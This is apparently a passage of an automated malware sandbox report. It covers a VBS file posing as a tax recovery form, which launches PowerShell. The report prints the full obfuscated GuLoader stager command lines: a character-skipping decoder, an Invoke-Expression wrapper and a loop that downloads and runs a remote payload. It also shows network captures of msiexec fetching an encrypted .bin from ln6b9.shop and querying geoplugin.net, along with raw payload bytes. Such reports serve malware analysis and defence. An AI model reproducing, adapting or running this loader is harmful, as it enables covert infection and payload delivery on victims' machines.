                    Oct 14, 2024 11:06:40.501159906 CEST1236INData Raw: 65 4b 64 7a 36 75 65 4e 6e 4a 4d 76 4b 6d 6b 36 6e 72 77 51 39 74 30 78 77 34 43 76 57 64 2b 76 43 6f 74 41 51 4e 6d 37 67 36 38 71 32 7a 41 68 35 5a 4d 66 4f 47 49 32 6d 39 48 35 4f 51 6c 43 42 6d 62 54 54 2f 72 37 2f 31 4f 33 50 6a 78 43 42 57
                    Data Ascii: eKdz6ueNnJMvKmk6nrwQ9t0xw4CvWd+vCotAQNm7g68q2zAh5ZMfOGI2m9H5OQlCBmbTT/r7/1O3PjxCBW001zALc1R7LaBvl+mxLnSC+WP7JCp2Lx67mE/LZtT3IFRpu/ZJE51EQrdqdGN8j4W8vahmFRGhRnatgQ1a4JvhGDUs/dQmsQ/W4MFkGLmjKVwKwCUVOt5s0/E1hnr+wKU4S4oR4YHPlaIJM93OGKGDFG+hiL5qCRP


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.649912172.67.128.117806448C:\Windows\SysWOW64\msiexec.exe
                    TimestampBytes transferredDirectionData
                    Oct 14, 2024 11:07:17.354773045 CEST174OUTGET /OxvwnGPq/OGaqsWdpjAA232.bin HTTP/1.1
                    User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                    Host: ln6b9.shop
                    Cache-Control: no-cache
                    Oct 14, 2024 11:07:18.081156015 CEST1236INHTTP/1.1 200 OK
                    Date: Mon, 14 Oct 2024 09:07:18 GMT
                    Content-Type: application/octet-stream
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 14 Oct 2024 09:07:17 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qunq2gIB7UXry5mmCzt7QWCpenIjSc2kWwOOBhnnp%2FMJ7Y4FgTpO1xjT6yACQVF5ui83eIYub3OpLZNc47X97unk9PTxDp2dGAsR5%2FbUGazxunWqEpeFx32EPEIl"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8d266b13fc298c17-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 33 38 63 37 0d 0a 27 ba 07 b1 21 36 35 01 bc a0 65 6a d8 ef 58 0e ab ee cb d2 f3 dd ae 3b 2e f1 fc 4a fb a4 fc 11 ef e1 ab ff 1a 93 c3 21 30 67 6e 2a a6 28 42 bd 73 30 78 32 57 cc 51 8a 43 e9 75 e0 1d 41 6a e7 d4 32 96 8e 4d 6c 2b 4a 12 06 e0 20 38 6a 23 25 4b 26 f7 6b 58 9c 2e 01 eb 46 ca bf d9 1a bc ea 4d 1f 25 9e b2 51 a8 ef ba 8f 35 85 58 c0 ee c6 91 77 ce db 59 4e 3a fd 53 93 0d 50 00 cc 5b 38 c3 04 00 eb 06 75 00 f6 88 65 07 96 e8 72 ac 16 1b 5b bc ce 61 f7 6e 6b d9 33 66 5f 7b 3d c7 8e 1c 7c 36 77 63 fe a4 10 c8 78 af 35 d4 24 86 5f 40 06 16 b4 5e 19 3d 67 b9 0a 50 52 9f 60 39 49 7e 6c 32 86 a9 7c ae 33 c0 9d 26 ff 7f d5 b0 29 13 9c a6 11 6a 6b be f8 52 08 0b fc 44 c6 b6 f9 e1 4c 5d c4 d9 39 3f b1 62 9c 26 e8 e6 0e 80 97 19 bf 80 f8 da bc 17 17 0c c0 de 97 d0 aa 3f f7 62 77 7e c7 29 15 f5 41 c9 98 0e fc fd 11 b5 7e 32 08 b5 cb 7c 36 76 01 c3 a6 85 2e a0 7c 4a 8f 49 46 f7 80 2a db a8 43 b5 d2 bd eb 2a f8 3f db 9b 89 78 89 74 a3 d6 cd 21 4f af 4d 92 49 33 98 b5 7b df d0 bd 35 77 d6 36 62 ce 55 [TRUNCATED]
                    Data Ascii: 38c7'!65ejX;.J!0gn*(Bs0x2WQCuAj2Ml+J 8j#%K&kX.FM%Q5XwYN:SP[8uer[ank3f_{=|6wcx5$_@^=gPR`9I~l2|3&)jkRDL]9?b&?bw~)A~2|6v.|JIF*C*?xt!OMI3{5w6bU] 9q1jrkxNSPy|t{18Jn_p"R.8=^y(E]IST|MzO@1Qv\="i)[ERak86#FfCN_` GRrYV\^0X5j1J
                    Oct 14, 2024 11:07:18.081228018 CEST1236INData Raw: 36 0d aa 85 4f a5 68 b7 3f 6f b4 dc a9 57 a3 a9 8f a7 af a7 83 ef cb 74 3a a6 b8 d3 1b 4f dc dc 55 c5 ec 33 f7 b1 69 95 21 e6 8d 9f 1a c8 c2 74 62 6d b8 bb 8a cf 6c 4f 34 f3 dc b0 64 ea 1b ad a6 62 9c 38 df fa eb 6c ba d6 8e 43 d8 58 13 6e 87 b9
                    Data Ascii: 6Oh?oWt:OU3i!tbmlO4db8lCXnX?5gT$2}.Dfhg{;qh&uq%_o<k9\B6iKp#gw0_#zdUe*Xf@;zMY\
                    Oct 14, 2024 11:07:18.081234932 CEST1236INData Raw: 2b f1 fb 8f 27 1d f1 77 71 15 14 ec ae 32 8f a6 73 d4 92 dc 67 6c c6 dc d4 3d ab 8c df 62 55 ee b3 f0 43 84 8c 8e a0 52 43 d5 bd 05 82 0a 92 9e 7a e6 82 c4 4d b3 90 56 9d d4 ce 25 2e 37 c7 d4 da 91 7c ae 96 f1 b9 bc b8 ff 50 e9 d7 e3 96 bf d2 a0
                    Data Ascii: +'wq2sgl=bUCRCzMV%.7|PiD(S(.eza[[^<kgem!-kC@!"-qQd8GynbwKTG- lzb!p|*.*8P-%M@|]*j&>'i6X
                    Oct 14, 2024 11:07:18.081248999 CEST1236INData Raw: 29 67 af 77 de e3 97 91 08 3c 18 0c 59 17 07 e9 8a e5 e0 15 9e 4a 3a 34 81 3d 06 9c ae b5 1a 83 be 04 1d e1 48 5f 2a 7d a8 5e a9 9a b8 bb fa 68 fe ca e0 75 55 10 14 6b e8 40 86 d1 50 21 a9 fd b5 43 bd a2 32 65 b1 f8 8e b4 53 2c e0 ed 3d d2 b3 28
                    Data Ascii: )gw<YJ:4=H_*}^huUk@P!C2eS,=(Xw^8%GX A|Zhr1.p)!@M+S/Fg5"x{qbC|/no3(0ksZhASZD3%D35Pa>wjmBJP#L_8b|`PO
                    Oct 14, 2024 11:07:18.081254959 CEST1236INData Raw: 95 9e 1a 1f 2e 67 58 25 61 a7 19 3c aa ba 70 00 41 72 87 ee 78 ed 3a 89 db d2 80 d2 0b 51 93 0d db d6 25 a6 3a cd 1b d0 c5 b8 49 23 7c a9 7e 8e f0 62 53 59 ba 58 6f 9c e8 ec ad c9 33 ff 5e e5 b0 30 14 a9 68 55 cc 7e 55 43 05 ec ea c2 56 c1 9c ad
                    Data Ascii: .gX%a<pArx:Q%:I#|~bSYXo3^0hU~UCV8-OMZS0b"JfX}~z}-i`&^w##t0Z'`'e)53 ##/kJ}D!hxU>JPfd{q(%;{RZU
                    Oct 14, 2024 11:07:18.081265926 CEST1236INData Raw: 6b 2c 48 a9 ba bf 52 9c 85 31 17 00 5e d8 d7 00 f9 4a a6 be 71 96 e0 a0 34 0a 2d 5a 9b 32 27 0e c2 8e ff 80 9b 8a c9 25 da d8 2b 0e 24 7e df d0 36 c5 1d ce 6f e9 c8 7e f2 99 57 6b 0d 4e f4 c8 d6 b5 9a be dc 92 b0 8f b4 dd bf f7 9d b4 63 d7 5d 55
                    Data Ascii: k,HR1^Jq4-Z2'%+$~6o~WkNc]U<2Nf3+dJ!dGc728TyHliG%(bnk;,4Ec,ajaTc\%7/kOK4/LU5+B8k-'i[ZdZJZ!
                    Oct 14, 2024 11:07:18.081285000 CEST1236INData Raw: 0e bf fe d9 ea 96 81 a8 a6 b1 c7 32 91 40 f0 1f 2c 1d c9 f6 05 99 a1 b2 b5 42 05 f7 19 9e 96 ec 39 50 d8 61 7c 62 c0 5d 5b 5b 23 4d 4a f4 18 19 9e 95 9e f5 8d f0 c8 0c 23 ea fb 19 ed 85 be 93 13 73 4e 10 91 39 4b dc 1f d1 71 b8 97 90 b0 79 63 eb
                    Data Ascii: 2@,B9Pa|b][[#MJ#sN9Kqycz G/)}+If#fjtK4 X-SW4lY;FgjMEwQ?0EC~]q >CX;r^v[WcH&@&gJqV#
                    Oct 14, 2024 11:07:18.081290960 CEST1236INData Raw: c0 6c 69 af ab 4e 7e eb 3d df 71 33 57 64 a5 8b c8 ad 50 f8 5c 0c 36 79 70 e4 5d a4 55 fa 02 ce 3e 34 9f 13 4c 10 54 d7 53 41 70 51 c8 fb 67 44 26 9a 21 a3 51 d2 c9 df e7 19 68 f6 7b 11 d7 2d 9d b0 a0 9b 08 2b 3f eb d1 72 00 14 21 7a 8d 53 56 2f
                    Data Ascii: liN~=q3WdP\6yp]U>4LTSApQgD&!Qh{-+?r!zSV/0a^wq0-&WDv.nf4$d>^Eex2)UC_| PDWC5=9{ YE&?%;WG^2w@wRj0*q7[m<UQ_t
                    Oct 14, 2024 11:07:18.081295967 CEST1236INData Raw: 46 3c eb 5a 20 7c ad 4e d5 e9 46 51 c1 17 0c af d2 4f 88 1c a9 83 c3 6a 30 5a e3 8e eb 8c bb 2b e2 55 65 a5 6e de 9e b8 13 93 56 a9 2b 22 03 6c ce 74 f3 69 15 74 be 73 a3 26 13 1b cd 2c f3 06 a5 83 c4 73 92 c0 04 42 b0 a4 da e2 86 a0 6c 13 8e 26
                    Data Ascii: F<Z |NFQOj0Z+UenV+"ltits&,sBl&v~kb%[-?9T,@1qWZwH@u>\E ~Q] .L5cE9~|H4[ @IA %}:h{ij^lk
                    Oct 14, 2024 11:07:18.081301928 CEST1236INData Raw: 66 f8 21 1f b9 93 51 ea a2 0d 30 99 58 36 4b 8e eb 09 19 d0 d0 fb 78 3b 54 56 9a c0 08 e1 c0 ee 8d 6f 33 04 91 ab 47 1d 53 9b d1 46 3b dc 2c 05 54 4a b6 68 a0 72 b1 78 1c 1f 74 5b d9 a7 69 66 24 38 e2 2f eb 84 2a 71 18 fe 70 16 83 04 c8 ef 8d e0
                    Data Ascii: f!Q0X6Kx;TVo3GSF;,TJhrxt[if$8/*qp0"x1U_"kvJ39&PFT6okX#!R$zD.Ec{2l>?$glVPocL;=+bJD%uTjI0
                    Oct 14, 2024 11:07:18.086337090 CEST1236INData Raw: 82 55 9c 7a 10 d4 e5 bd 56 1e 97 28 70 32 c8 43 82 96 c6 e1 3e ea 6f 1f f1 53 a6 25 56 f9 26 9d 74 49 b5 e2 4c a2 60 9f b2 86 f9 ff 62 26 09 99 87 c6 45 70 21 0a 37 44 b6 de ab 3e ad e4 75 55 48 ad 7e b5 e4 8d 2d 25 61 87 1d 41 2d 9e a3 a8 23 e4
                    Data Ascii: UzV(p2C>oS%V&tIL`b&Ep!7D>uUH~-%aA-#uw?`!J/McNe#XX{+3iz&})2S{93r&w*TU)qkYLX}YW2O4O6q+y]|@p?R


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.649945178.237.33.50806448C:\Windows\SysWOW64\msiexec.exe
                    TimestampBytes transferredDirectionData
                    Oct 14, 2024 11:07:22.399662018 CEST71OUTGET /json.gp HTTP/1.1
                    Host: geoplugin.net
                    Cache-Control: no-cache
                    Oct 14, 2024 11:07:23.027940989 CEST1170INHTTP/1.1 200 OK
                    date: Mon, 14 Oct 2024 09:07:22 GMT
                    server: Apache
                    content-length: 962
                    content-type: application/json; charset=utf-8
                    cache-control: public, max-age=300
                    access-control-allow-origin: *
                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:05:06:33
                    Start date:14/10/2024
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs"
                    Imagebase:0x7ff6089a0000
                    File size:170'496 bytes
                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:05:06:36
                    Start date:14/10/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlaeRan( Wi$ A D VeoRe l Pek RehApia Adl Tie orr AnnNateBac,Fas$C lD uyi ins PupTellUd.aU syEn.kAntoC.rrRoktEle)Rov ';$Displaykort=$Medicine;Donought (Capulet43 'Fil$F ugFrmlRagO.dsBTelAs yL Ea:dkko r sVanT emELi O iCFaroLarL MaLDysAKir= am(OmhTFeje CusLitTfor- arp BrAscotsynH In cac$Grad ReiUnbsAquP n lAbjAHegyTllkKonOJe r AmtTat)Bil ');while (!$Osteocolla) {Donought (Capulet43 'but$LevgGlolPerocolbVeca yplIsc:TinfOverU.deskalGrasTabesrsr ErsRe =,od$Wr tDumrKenu heeHyp ') ;Donought $Taarnfalkes;Donought (Capulet43 'GoysHusTBanAsivRTllt Pn-Mogs E LMetETe eBauPBo Reg4Ban ');Donought (Capulet43 ',am$Blig dil jaOKleBEmaareflP s:MetoPres Zot HaeMapOs nc UnoOutLFeuLRevaMns= Pl( .et OvEPacsLset nb- jPUnpA.toTPaihMil Gro$A lD L iAans,ntP N,lserAYadyHypk .uO OrRMost.nb) pa ') ;Donought (Capulet43 's j$K.sGRgsL L.OTilBsltAUndLVrv:sennI.eEH bIDisGUndHsilBUndoNatR miiskaNR ugElf2Ta 4 Fo1Lyk= de$ReggKugl DiOsp bTriaspgLOve: BuFgr,Is,iLErrL KuO.kow .ri F tArcEPhi+Pri+ Ad%Far$MaskAnaOT,gnVe s meOR,nLOffi NvDCy,eT drUnmiBasnAcyGMil.MalcA tOTrouBilNUp tHyp ') ;$Dolkhalerne=$Konsolidering[$Neighboring241];}$prefertilization=292042;$Wavenumber1=30384;Donought (Capulet43 'f l$Du.g B,LPsyoundbOprAGenlErg:PolBG uiResp R LC,aOTras MeIAgrVBesEpre1 ,n6Bra5Bar Rea=I e .gogToleDi.tPre-Ko,cPutOT eNDo tAsseRelN setDer suf$HrgDTrbiHyps T.PCapL BuA ,uyFagk skoTilR utNom ');Donought (Capulet43 ' Bi$ EkgDikl proUndbBl.a Bulsma:satKM,nvNe aPhynskat T.iNontLsresp tDicsNiem rsUn.sR cihe,gMadeInt syg=sov Gra[U ss layOprsDiutOveeP ems u.HasC emomasnservTh eRegr P tTv ]A b:Ter:,enFsamr ,nosammAutB MaaPe s re,or6Non4 bsskn.tUdkrPl iI pnTilgHan( G $ alBAdoiPropIrrlTraoHemsOutiCa vAr,este1 Al6Ga.5Bes)Rej ');Donought (Capulet43 ' he$ CrGW.oLOv oRegbLy AKomLKry:BrusH lK LiA,ntfTasfA,leGenr ConCooE.ng Pat=Erk la[ NosR kYsl s gat,npeTo mDe . reT G.EOsmxWintFul.abre ,iNC gCAlto Bad ejIHydNParGs i]Udb:Pan:sulAMotsDelC.veiKo,IMi . ArgInde ChTTilsFr TXerR Eni anDevgDec(Mal$ arKJa v ataGelNCamt skIBebTplee saTN nsMicMAfks glsManIHomGPe esqu)U s ');Donought (Capulet43 'Ni.$TakgspyLR.yOMidB stA A lsup: TiRComEPl n.igdDi.ePo,s.eptKatePronshaEOmoNsal=I d$ MasLikkKonaE,af .aFBabe.etr Ggn HeEs.o.AktsR.euAfbB es stT TorIntiB sNIroGA l(Pte$PecpL,gRthrE PrFAndeCalr.ulT alisgel WaI UvzuntA Wat.ariFraoBjeNDet, An$.irwV nA CoVBlaeB mnYa,UTrom,otBHaaEsupr yn1Ant) om ');Donought $Rendestenen;"
                    Imagebase:0x7ff6e3d50000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:05:06:36
                    Start date:14/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff66e660000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:05:06:44
                    Start date:14/10/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlaeRan( Wi$ A D VeoRe l Pek RehApia Adl Tie orr AnnNateBac,Fas$C lD uyi ins PupTellUd.aU syEn.kAntoC.rrRoktEle)Rov ';$Displaykort=$Medicine;Donought (Capulet43 'Fil$F ugFrmlRagO.dsBTelAs yL Ea:dkko r sVanT emELi O iCFaroLarL MaLDysAKir= am(OmhTFeje CusLitTfor- arp BrAscotsynH In cac$Grad ReiUnbsAquP n lAbjAHegyTllkKonOJe r AmtTat)Bil ');while (!$Osteocolla) {Donought (Capulet43 'but$LevgGlolPerocolbVeca yplIsc:TinfOverU.deskalGrasTabesrsr ErsRe =,od$Wr tDumrKenu heeHyp ') ;Donought $Taarnfalkes;Donought (Capulet43 'GoysHusTBanAsivRTllt Pn-Mogs E LMetETe eBauPBo Reg4Ban ');Donought (Capulet43 ',am$Blig dil jaOKleBEmaareflP s:MetoPres Zot HaeMapOs nc UnoOutLFeuLRevaMns= Pl( .et OvEPacsLset nb- jPUnpA.toTPaihMil Gro$A lD L iAans,ntP N,lserAYadyHypk .uO OrRMost.nb) pa ') ;Donought (Capulet43 's j$K.sGRgsL L.OTilBsltAUndLVrv:sennI.eEH bIDisGUndHsilBUndoNatR miiskaNR ugElf2Ta 4 Fo1Lyk= de$ReggKugl DiOsp bTriaspgLOve: BuFgr,Is,iLErrL KuO.kow .ri F tArcEPhi+Pri+ Ad%Far$MaskAnaOT,gnVe s meOR,nLOffi NvDCy,eT drUnmiBasnAcyGMil.MalcA tOTrouBilNUp tHyp ') ;$Dolkhalerne=$Konsolidering[$Neighboring241];}$prefertilization=292042;$Wavenumber1=30384;Donought (Capulet43 'f l$Du.g B,LPsyoundbOprAGenlErg:PolBG uiResp R LC,aOTras MeIAgrVBesEpre1 ,n6Bra5Bar Rea=I e .gogToleDi.tPre-Ko,cPutOT eNDo tAsseRelN setDer suf$HrgDTrbiHyps T.PCapL BuA ,uyFagk skoTilR utNom ');Donought (Capulet43 ' Bi$ EkgDikl proUndbBl.a Bulsma:satKM,nvNe aPhynskat T.iNontLsresp tDicsNiem rsUn.sR cihe,gMadeInt syg=sov Gra[U ss layOprsDiutOveeP ems u.HasC emomasnservTh eRegr P tTv ]A b:Ter:,enFsamr ,nosammAutB MaaPe s re,or6Non4 bsskn.tUdkrPl iI pnTilgHan( G $ alBAdoiPropIrrlTraoHemsOutiCa vAr,este1 Al6Ga.5Bes)Rej ');Donought (Capulet43 ' he$ CrGW.oLOv oRegbLy AKomLKry:BrusH lK LiA,ntfTasfA,leGenr 